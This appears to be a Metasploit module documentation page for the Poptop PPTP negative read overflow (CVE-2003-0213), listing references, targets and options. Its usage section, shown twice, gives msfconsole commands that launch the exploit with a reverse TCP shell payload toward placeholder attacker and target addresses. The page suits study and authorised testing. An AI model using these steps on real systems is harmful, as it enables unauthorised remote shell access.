Poptop Negative Read Overflow
This is an exploit for the Poptop negative read overflow. This will work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I currently do not have a good way to detect Poptop versions. The server will by default only allow 4 concurrent manager processes (what we run our code in), so you could have a max of 4 shells at once. Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock.
Exploit Rank
- Great
Exploit Authors
- spoonm < spoonm [at] no$email.com >
Vulnerability References
- CVE-2003-0213
- OSVDB-3293
- http://securityfocus.com/archive/1/317995
- http://www.freewebs.com/blightninjas/
Exploit Targets
- 0 - Linux Bruteforce (default)
Exploit Development
Similar Exploit Modules
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/linux/pptp/poptop_negative_read
msf exploit(poptop_negative_read) > show payloads
msf exploit(poptop_negative_read) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(poptop_negative_read) > set LHOST [MY IP ADDRESS]
msf exploit(poptop_negative_read) > set RHOST [TARGET IP]
msf exploit(poptop_negative_read) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/linux/pptp/poptop_negative_read
msf exploit(poptop_negative_read) > show payloads
msf exploit(poptop_negative_read) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(poptop_negative_read) > set LHOST [MY IP ADDRESS]
msf exploit(poptop_negative_read) > set RHOST [TARGET IP]
msf exploit(poptop_negative_read) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 1723) |
| BruteStep | Step size between brute force attempts |
| BruteWait | Delay between brute force attempts |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| ExtraSpace | The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested. |
| Hostname | PPTP Packet hostname |
| PreReturnLength | Space before we hit the return address. Affects PayloadSpace. |
| Proxies | Use a proxy chain |
| RetLength | Length of returns after payload. |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| VERBOSE | Enable detailed status messages |
| Vendor | PPTP Packet vendor |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |